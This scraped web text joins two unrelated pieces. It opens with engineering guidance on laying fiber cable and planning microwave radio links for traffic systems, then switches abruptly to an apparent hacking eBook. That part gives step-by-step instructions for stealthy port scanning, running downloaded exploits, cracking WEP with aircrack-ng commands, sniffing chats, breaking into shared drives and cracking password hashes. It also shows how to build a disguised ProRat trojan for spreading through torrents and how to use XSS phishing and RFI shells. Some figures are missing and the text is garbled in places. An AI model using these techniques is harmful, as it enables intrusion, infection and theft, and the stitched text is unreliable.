The lowest set of lines must be placed at least 15 feet above grade. If there is not enough room to accommodate all valid users, it is necessary to raise the height of the pole. The last user is responsible for paying the cost of installing the extension or taller pole and moving all users to their appropriate position.
Using existing utility poles can be very expensive. Cable can be buried directly in soil using one of two general construction methods: open trench construction, or cable plow.
In both instances, a cable rated for direct burial should be used. These cables are designed with a metallic armor sheath to prevent damage from rodents that may try to chew through the cable. The direct burial method is especially useful in rural and suburban locations.
The non-paved portion of a rural road or highway right-of-way is a good candidate for this construction method. The route must be carefully planned taking care to avoid other buried utilities water, electrical, telephone, gas, etc.
Using the open trench construction method, a backhoe is used to dig a 36 inch deep trench. The trench is backfilled with an appropriate material to prevent cable bends due to settlement. The trench is then filled to a level of 24 inches. A yellow warning tape is then laid in the trench before completing the fill process to terrain level. The 36 inch depth is an average. The cable should always be buried below the frost line. The actual depth of the cable may vary based on road crossings, or drainage ditch drainage lines crossings.
The object is to keep the cable out of harm's way. A second direct bury construction method uses a plow to open the earth, lay the cable and then cover. This is an economical and efficient construction method. However, no warning tape is installed. Use of these methods does not eliminate the need to consider placement of slack cable and access handholes. There will always be a need to add communication devices and access nodes to a system.
Direct buried cable is always identified at the road level using orange marker poles. The poles have information indicating that communication cable is buried below together with contact information in case of damage to the cable.
Markers should be place about every feet, plus on either side of a road crossing, drive way crossing and bridge crossing. A variant of the direct bury cable construction method is direct bury of flexible conduit. If plans call for installation of additional fiber cables in the same route within a few years, the burial of flexible tube conduit with the initial cable provides significant savings over re-opening a trench.
When "Level 3" needs to install additional fiber cable in their route, the flexible tube conduit can be used to minimize construction costs. This method also reduces traffic congestion due to construction. Placing cable in conduit is the most expensive solution for constructing a fiber optic cable route. Starting from scratch requires a significant amount of planning, especially in urban areas where most conduit is used. All utilities in or near the proposed construction path must be located and marked.
The path may have to be realigned to avoid some of the utilities, or a proposal developed to temporarily interrupt service and then repair the damaged utility lines. Environmental issues must be addressed. Where construction is proposed for existing streets or roads, repair and restoration costs must be considered. Maintenance and protection of vehicular and pedestrian traffic must be implemented. The conduit structure must be designed to meet bending radius requirements of the communication cable.
This helps to prevent cable drag when pulling through the conduit. Cable installed in conduit should be rated for immersion in water. All in-ground conduit eventually contains some water.
Cables designed for this purpose are constructed with a sealant that prevents water from penetrating the fiber or copper transmission media. If the conduit is buried at a depth of greater than three feet, it may be necessary to dig a trench that is wide enough to allow space for construction personnel.
Trenching at a depth of more than six feet, will require "shoring" walls see local construction codes for specific requirements to prevent collapse and injury to construction personnel. Most conduit used for telecommunications cable projects is high density polyethylene HDPE.
This standard was developed to assure that conduit from different manufacturers could be used with assurance that the inside and outside diameters of conduit pipe and the thickness of the conduit wall would match.
Some DOT's may require the use of steel conduit for bridge crossings or other types of construction. Using appropriate couplings, steel and HDPE can be mixed. HDPE is lighter in weight and easier to handle than steel, however, under certain loading circumstances it may not be as rigid. Wireless media are used to support communication links between devices and the TCC. This is often viewed as a low cost alternative to the installation of communication cable. Many departments are using spread spectrum radio in the MHz and 2.
This section will focus on mounting of radio antennas and transmission line for "line-of-sight" also called microwave radio systems. These are the systems commonly used for traffic control and freeway management.
The design and construction of towers and poles is completed within standard civil engineering practices and local codes. This also holds true for building mounted antenna supporting structures. System planning is critical to the successful installation, operation and proper performance of any communication system, wireless systems are no exception, and this is especially true for line-of-sight microwave wireless. Unless your proposed microwave link will be operating over a very long path, you should be able to confirm whether a visible line-of-sight path exists between the two proposed antenna sites.
This is only a first-step process, and is often accomplished by using a combination of strobe lights, mirrors which reflect the sun , binoculars and spotting scopes. Being able to see one site from the other will not guarantee that the visible path is appropriate for a microwave signal, but at least you who know that the possibility of such a path exists.
High frequency radios, such as those used in Spread Spectrum Radio require line-of-sight between antennas. In many instances there may be obstacles to overcome such as buildings, trees, small hills and elevated roads, and it may not be possible to confirm that line-of-sight exists without additional aid.
Keep in mind that even a "perfectly clear" visual path may not actually be so. As an example, small branches of deciduous trees, barren in the winter, may not be visible until spring or summer when growth appears. Even the skeleton of a new building may not be visible until the sides go up! Establishing line-of-sight for traffic signal systems should be easy to accomplish because of the short distances involved a few blocks.
When establishing line-of-sight, it is extremely important to plan for the future. In urban areas, new building construction may result in total path obstruction.
In areas where construction is not anticipated, the rapid growth of trees or foliage may severely affect the path over time. While a number of software products are available for assisting with path work, combining a topographical mapping of the path with a subsequent path walk or drive is often an excellent way to start the line-of-sight confirmation process. Assuming an appropriate line-of-sight path from radio site to radio site can be established, both the feasibility and viability of a point-to-point microwave radio link will be dependent upon the gains, losses and receiver sensitivity corresponding with the system.
Gains are associated with the transmitter power output of the radio, and the gains of both the transmitting and receiving antennas. Losses are associated with the cabling between the radios and their respective antennas, and with the path between the antennas.
Other losses can also occur if the path is partially obstructed, or if path reflections cancel a portion of the normal receive signal. Manufacturers will state respective RF power output and gain for each of their products. Radio transmitters are described in terms of power output expressed in watts. The power output may also be expressed in terms of decibels of gain dB. Radio receivers are rated in terms of sensitivity ability to receive a minimal signal. The rating is listed in terms of milliwatts mW , or decibels of gain dB.
Antenna cable is rated in terms of signal loss per foot and expressed as dB of loss per foot. The antenna is rated in terms of gain dB. There are a number of software programs that will calculate path loss by frequency and use the specifications of the system hardware to help determine the overall system feasibility. One of the first items to consider for any microwave path is the actual distance from antenna to antenna.
The further a microwave signal must travel, the greater the signal loss. This form of attenuation is termed free space loss FSL. Assuming an unobstructed path, only two variables need to be considered in FSL calculations:.
A signal transmitted at a frequency of 6 GHz will have more available power than a signal transmitted at 11 GHz. For example, a microwave system at 6 GHz can expect to cover about 25 miles between communication points. The same system using a frequency of 11 GHz will only cover about 10 miles. When RF energy is transmitted from a parabolic antenna, the energy spreads outward, much like the beam from a flashlight.
This microwave beam can be influenced by the terrain between the antennas, as well as by objects in or along the path. When the centerline of a beam from one antenna to another antenna just grazes an obstacle along the path, some level of signal loss will occur due to diffraction.
The amount of signal loss can vary dramatically, influenced by the physical characteristics and the distance of the object from the antenna. A microwave beam can also be reflected by water or relatively smooth terrain, very much in the same way a light beam can be reflected from a mirror. Again, since the wavelength of a microwave beam is much longer than that of a visible light beam, the criteria for defining "smooth terrain" is quite different between the two.
While a light beam may not reflect well off of an asphalt road, a dirt field, a billboard, or the side of a building, to a microwave beam these can all be highly reflective surfaces. Even gently rolling country can prove to be a good reflector. A microwave beam arriving at an antenna could effectively be canceled by its own "mid-path" reflection, causing tremendous signal loss. Long microwave paths can also be affected by atmospheric refraction, the result of variations in the dielectric constant of the atmosphere.
For relatively short 2. The effects of atmosphere and earth curvature will not usually come into play, so the engineering of these paths is quite straightforward. For long or unusual paths, however, all aspects of path engineering must be considered. Interference Issues — Spread spectrum microwave radio systems are among the most interference tolerant communication networks in use today. Spread spectrum signals are very difficult to detect and, by their nature, are highly resistant to jamming and interference.
As more and more signals are transmitted, the "noise level" in the band increases accordingly. Once the noise reaches an identified level, communication in the band is effectively negated. In the U. While these links are usually able to spread narrow band interference, other spread spectrum signals in the 2.
It is extremely difficult to predict the effect of an interfering signal unless specific information is known about the interferer. In general, other spread spectrum signals in the 2. For this reason, even when working with paths which are very short and not subject to any sort of fading condition, a fade margin of 15 dB or greater should always be maintained for the path.
All RF systems have an antenna or several in an array. The transponder used in a vehicle for toll collection has an antenna. The fact that it can't be seen doesn't mean that it isn't present.
The antenna is built in-to the package. A cost comparison of all the elements that make up a radio system would show the antenna as the lowest cost piece.
However, most of the problems that a radio system may have can be traced to either improper installation, or improper selection, of the antenna. You could narrow down the number of results by adding a specific word after. This search could list several emails that are published on the website.
Now that the basics of footprinting have been explained, we will move on to port scanning. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. Otherwise known as Zenmap. First the hacker would choose a target and place it in the target box.
This is what the command would look like if you were running the CLI version. A smart hacker would go with a quick and quiet scan.
Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information. A sample scan result may look like the following: 4. As you can see it found a few open ports and listed the services that are run on them.
Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible. A simple way to determine what the server is running is by getting a error page. On most sites the error page displays the server operating system along with its version.
Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running. One way the hacker can get this information, is to telnet into service port. If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default.
You can install it by doing the following simple steps. The telnet command should now be installed 1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit.
As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command: telnet www. So a hacker would insert a target URL in place of localhost. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below.
This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered. Searching for Vulnerabilities Now that the hacker has the name of the software being used and its version number, he would take that information and search a couple vulnerability databases for an exploit. If a skillful hacker is determined, he may try to locate a vulnerability in the current software version and develop an exploit for it.
You might be wondering why 0-days are worth so much. Denial-of-Service DoS — There are many types of DoS attacks, but they all have one purpose: to make the target server unavailable for legitimate users. The most common type of DoS attack is when the hacker sends a flood of information to the target server causing it to use up all of its resources, and in return pushing it offline, or causing it to deny requests from legitimate users trying to access it.
Buffer Overflow BoF — A buffer overflow happens when a program attempts to store more data into a buffer, or a data storage area, then it was meant to hold. Because the buffer was only meant to hold a certain amount of data, the extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker.
Once this code is executed, the hacker can receive full control of the server. Below are their definitions: Local Exploit — To run a local exploit, you must first have access and privileges on the machine.
Local exploits are usually used to escalate ones privileges to admin or root. In other words, it allows an ordinary user to gain root privileges. A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit.
Penetrating So now you might be wondering: Once the hacker finds the right exploit, how does he go about running it against the target and penetrating the server? This will all be explained in this chapter. As you search Milw0rm or any of the other couple exploit database websites provided in this chapter, you will notice that the exploits are created in many different types of programming languages.
Below I will list a few of the most common programming languages used, and how a hacker would compile and run them against a server. Below are the steps the hacker would take. First the hacker would need to install PHP onto his computer. Every exploit is different. Some you have to know what to edit and some have runtime instructions.
Next open up the command prompt or terminal if you are using a Mac, and go to the PHP directory by using the CD change directory command followed by the directory location. You should get a couple errors. The above is a simple example. Also every now and then you will receive other errors such as the one the second picture shows above.
These errors have to do with the server configurations. Now as a hacker, you have to learn a lot on your own. By going around asking simple questions like this all the time will make you look bad and the most common response you will receive: www.
Google is your friend, so take advantage of it! So starting now, begin to use Google, and if you are still stuck, then you can ask help on community forums. Once the errors are fixed and the program is running, a DoS attack will be launched the target website up until you exit the command screen. Eventually the server may go down completely. Download and install the appropriate version of ActivePerl.
Next the hacker would find an exploit for vulnerability. This is also a Denial of Service DoS exploit. Edit the options like the target server and others as needed. The attack has begun. Python Python is also a common programming language used in creating exploits. The steps to running a Python exploit are just as easy as the ones for Perl.
Hint: Python files end with. You can usually find this information commented in the top of the script. Below is a list of the most popular compilers for each operating system. Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in windows.
Open up Terminal. You should see the following screen: 4. You are now in insert mode. Right click and paste in the exploit. The script should have pasted in. This quits and saves the document as exploit. Now type in the command: ls. This command lists all the files in the current directory. You should see your newly made file in the list. This command downloads the package and then asks you if you would like to continue with installing.
It automatically will install the package. If there was no error displayed, then it was successful. This will display a little note telling you how to run the exploit against a server. The below image shows all of these steps together. The last line of the picture shows the proper way a hacker would use the script against a server. Below is an image of what the root account on Ubuntu would look like.
In this case I am root. Run the installer. Choose to install from the internet. Continue on until it asks you to choose a mirror to download from. Choose any. Next you must select packages to download. Expand the window so that you can see all of the columns. It will begin to install the packages 8.
Once it is installed, double click the desktop icon and a command prompt should come up. It will now display the scripts runtime directions. Put in the right options and parameters and run the script again. The picture below shows all of these steps being done. Once a hacker runs this script against a vulnerable machine and the script works, he will have root access to the target computer.
Many exploits are created and tested in specific environments and the expected outcome only happens when the exploit is run in the exact same environment. That is another reason why programming knowledge is needed, so you could edit the exploit script to work for you. Once a skilled hacker gains root to a server he has the ability to do a lot of damage.
Countermeasures There are a few things you can do to stay secure from network hacking attempts. Keep all your software up to date. There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out.
Implement a firewall. This will keep most of the bad data out and good data in. Install anti-virus software. Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system. You can get internet access with a wireless enabled laptop almost everywhere you go. In this chapter I will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside. The hacker starts by scanning for wireless networks near him.
The Windows tool we will use in this section is called NetStumbler. Also by the time you receive this eBook MacStumbler may already be released for those of you using a Mac. Download and install NetStumbler. Run it. It automatically starts to scan for wireless access points. Once it is completed, you should see a list of all the wireless access points around you. The more green and the less spaces, the better the signal. It provides the MAC address, Channel number, encryption type, and a bunch more.
All of these come in use when a hacker decides he wants to get in the secured network by cracking the encryption. Backtrack comes with a huge list of preloaded software for this very purpose.
Before we begin, there are a couple requirements: 1. You need a computer with a compatible wireless adapter. Download Backtrack and create a Live CD. First we will find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. To be able to do some of the later things, your wireless adapter must be put into monitor mode.
Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Once you find an access point, open a text document and paste in the networks broadcast name essid , its mac address bssid and its channel number.
The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command: airodump-ng -c [channel ] -w [filename] --bssid [bssid] [device] In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after --bssid. The command ends with the device name. Make sure to leave out the brackets.
Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command: aireplay-ng -1 0 -a [bssid] -h -e [essid] [device] In the above command we are using the airplay-ng program.
The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name essid of the target access point, and the command ends with the your wireless adapters device name.
Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. Once you have collected around 50kk packets, you may begin the attempt to break the WEP key.
The command to begin the cracking process is: aircrack-ng -a 1 -b [bssid] -n [filename]. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key. With all the different computers and network adapters out there, you may come across a error occasionally.
If you get stuck, remember, Google is your friend! Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker gains access to wireless network he could intercept private information going through a network such as: usernames, passwords, IM conversations, and e-mails. Download and install Wireshark. Launch it and click on the option to list the available capture interfaces as shown below. Next choose the target to begin to capture their packets and click on start.
Many captured packets shows that the user is currently active. Now to show you an example of how Wireshark can be used I will start up Windows Live and send a message. As you will see in the image below, my whole conversation will be captured. As you can see, my message is displayed at the bottom. If I continue down the list I can see the whole conversation.
Change your routers default password and make sure you have WAP encryption enabled. It is better than nothing. Use a long secure password for your router. Include numbers, lowercase letters, uppercase letters and other symbols.
The more obscure the better. Make sure your router has the option to not broadcast your SSID enabled. This will prevent some programs like Net Stumbler from locating your wireless network. Use MAC filtering on your router. Every wireless card and wireless adapter has a MAC address. By choosing to allow only your MAC addresses onto the network, you can keep a lot of attackers out. To prevent packet sniffing attacks from affecting you, make sure the important sites you use, like banks, use SSL Secure Socket Layer encryption.
The only thing required is for the target machine to have file and printer sharing enabled and to have port open. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner. Download and install it. Next the hacker would insert the IP range he would like to scan. Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port.
Click YES. Type in the port number into the first box and click OK. Click start. As you can see Ips were scanned. Out of those only one was alive and luckily it has port open. Without it, this attack is not possible. This means that file and printer sharing is enabled.
This command will display any shared drives, folders, files or printers. In my case, I got the following: In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk. To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer.
If successful, the hacker will have all the contents of my drive on his computer. This just tells the computer what to name the drive on your computer.
Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter.
Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the targets documents. Ophcrack is a Windows only password cracker, and it uses rainbow tables to get the job done quickly.
Windows uses a couple a couple types of hashes. One of them is the LM Lan Manager hash. If a password is longer than seven characters, then it is split into seven character chunks, made into all uppercase, and then hashed with the DES encryption. Because it is split into parts and made all uppercase, the total number of different password combinations goes down significantly, and makes it easier for hackers to crack the password. So you might be wondering, how can I get a copy of those hashes?
There are a couple ways. First download and install ophcrack. As you can see there are two versions. In this example we will be using the program itself in windows, so download the first option. Once you have it downloaded, install it. When the option comes up to download rainbow tables, unclick them all and just install the program. It is better to download the rainbow tables separately.
Once it is installed, go to the ophcrack website and click on Tables in the navigation. This will display all the tables you can download. As you can see, the more characters covered, the bigger the table gets.
Choose the correct table for your operating system. In the example, I chose the largest possible free table. Next run ophcrack and click on tables. Select the table you downloaded and click Install to locate the file on your computer.
Hit OK to continue. Make sure all of your anti-virus and anti-spyware programs are disabled because most anti-virus programs mistake PWDUMP for a malicious program since it accesses the system files. This will load all the password hashes for all the users on your computer and display them. Next click Crack and the program will begin to crack the password hashes. Go to the ophcrack website and choose the correct operating system LiveCD to download.
With the downloaded. If this also fails, go into Ophcrack Text mode. Once it ophcrack loads completely, it will automatically get your Windows password hashes and begin the cracking process. Network Connection 2. Everyday thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware, and give you an example of a windows trojan in use.
The reason we will use Windows is because malware is very rare in Linux and Mac computers. Definitions 1.
Viruses — Viruses cannot spread without the help of us humans. They are like parasites because they need a host to attach themselves to. The host is usually a legitimate looking program or file. Once this program is launched, the virus is executed and infects other files on your computer. Viruses can be very destructive. They can do damage to your computer hardware, software and files. Viruses are spread through the sharing of files and are many times sent within emails via attachments.
Worms — A worm is a malicious program that can replicate itself onto other computers on a network. Once it infects a system, it uses that system to send out other copies of itself to other random systems attempting to infect them. Trojan Horse — A trojan horse is a malicious program that can be used to do silly things to a system like changing its desktop, mess with the user interface, and take control of your mouse.
It can also be used for some serious things like accessing your data, erasing your files, stealing your passwords, and capturing your keystrokes. Logic Bombs — Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain time or until a user does a certain action which causes it to be executed. Bacteria — Bacteria make many copies of themselves and eventually end up taking up all of the computers recourses such as all of its processor power, memory and disk space.
This results in the legitimate user losing access to those resources. Blended Threats — Blended threats combine all of the characteristics of the above and use them along with system vulnerabilities to spread and infect machines. Download ProRat.
Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. Open up the program. Next we will create the actual Trojan file. Next put in your IP address so the server could connect to you. Next put in your e-mail so that when and if a victim gets infected it will send you a message.
We will not be using the rest of the options. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file.
Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. Click on Server Icon to continue. Here you will choose an icon for your server file to have.
The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.
Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected.
He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.
Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. The image below shows the message I would get on my screen if the hacker chose to message me. Below is an image of my task bar after the hacker clicks on Hide Start Button.
Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti- virus programs.
Countermeasures There are a couple things you can do to prevent yourself from being infected by the malware discussed in this chapter. Make sure you have good and up-to-date anti-virus software installed on your computer. Also if there is an automatic update option on your anti- virus software, make sure it is enabled. Make sure you have a firewall installed on your computer and make sure that it is actually enabled.
Firewalls protect against unauthorized inbound and outbound connections. Many of the web applications that run these dynamic websites have security flaws. In this chapter, we will discuss some of the most popular forms of attacks against web applications. Local — Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.
Non-persistent attacks occur when - a scripting language that is used for client-side web development. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker. Persistent — Persistent attacks are usually used against web applications like guest books, forums, and shout boxes.
Now we will insert some HTML. Now we will insert JavaScript. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment. Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic then the above examples, I will show you how a hacker could use XSS to help with phishing.
If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website.
In the URL the hacker would then replace everything in between? Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.
Remote File Inclusion Remote File Inclusion RFI occurs when a remote file, usually a shell a graphical interface for browsing remote files and running your own code on a server , is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server.
With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. Although as of PHP 6. Many hackers use Google dorks to locate servers vulnerable to RFI. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
A couple of the most popular shells are c99 and r A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c This will display many websites with the shell already up and ready to be included.
At the end of the URL make sure to add a? This tells the server to ignore everything after c Hackers usually search vulnerability databases like www. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following: The shell will display information about the remote server and list all the files and directories on it.
The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server.
0コメント